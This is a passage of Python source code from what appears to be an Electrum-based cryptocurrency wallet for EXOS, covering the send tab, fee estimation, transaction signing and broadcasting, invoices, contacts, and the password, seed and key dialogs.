self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
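# Colour convention for the send form: red means "not enough funds" (with the
# frozen balance appended when that explains the shortfall), blue marks values
# auto-filled from the user's last edit, default styling marks direct input.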
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _("Not enough funds")
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += " ({} {} {})".format(
self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen")
)
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
self.max_button.setChecked(True)
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
return
outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [TxOutput(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
coins, outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
self.logger.exception('')
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate is not None:
displayed_feerate = quantize_feerate(displayed_feerate)
else:
# fallback to actual fee
displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(int(feerounding))
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(abs(feerounding) >= 1)
if self.max_button.isChecked():
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d" % x.get('prevout_n') + '\t' + "%s" % x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem([format(item), self.format_amount(item['value'])]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
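# Three estimator shapes are produced here, all consumed as 'fixed_fee' by
# make_unsigned_transaction: an int for a frozen absolute fee, a callable
# built from a frozen feerate (exo/byte * 1000 -> exo/kB), or None to fall
# back to dynamic fee estimation.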
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # exo/byte feerate
amount = 0 if amount is None else amount * 1000 # exo/kilobyte feerate
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_send_tab(self):
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def check_send_tab_outputs_and_show_errors(self, outputs) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.address is None:
self.show_error(_('EXOS Address is None'))
return True
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid EXOS Address'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def do_preview(self):
self.do_send(preview=True)
def do_send(self, preview=False):
if run_hook('abort_send', self):
return
outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
if self.check_send_tab_outputs_and_show_errors(outputs):
return
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
self.show_message(str(e))
return
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
except BaseException as e:
self.logger.exception('')
self.show_message(str(e))
return
amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.config.get('use_rbf', True)
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > feerate_warning * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
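# Broadcasting runs in a worker thread behind a WaitingDialog; on success it
# marks a matching BIP70 invoice as paid and sends the payment ACK on the
# network's asyncio loop, while broadcast_done reports back on the GUI thread.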
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
if isinstance(self.wallet, Multisig_Wallet):
parent.close()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_state_of_coins(self, utxos, freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_addresses', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of payees in the \'Pay to\' field.'),
_('One payee per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
if pr is None:
self.show_error('Cannot find payment request in wallet.')
return
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2]) + ' ' + self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
f.write(pr.raw)
self.show_message(_('Invoice saved as') + ' ' + fn)
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum_exos,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0] == '_' or m in ['network', 'wallet', 'config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum_exos.storage import STO_EV_XPUB_PW
if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(str(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
mpk_text.repaint() # macOS hack for #4777
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )'
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in EXOS-Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid EXOS address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid EXOS address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
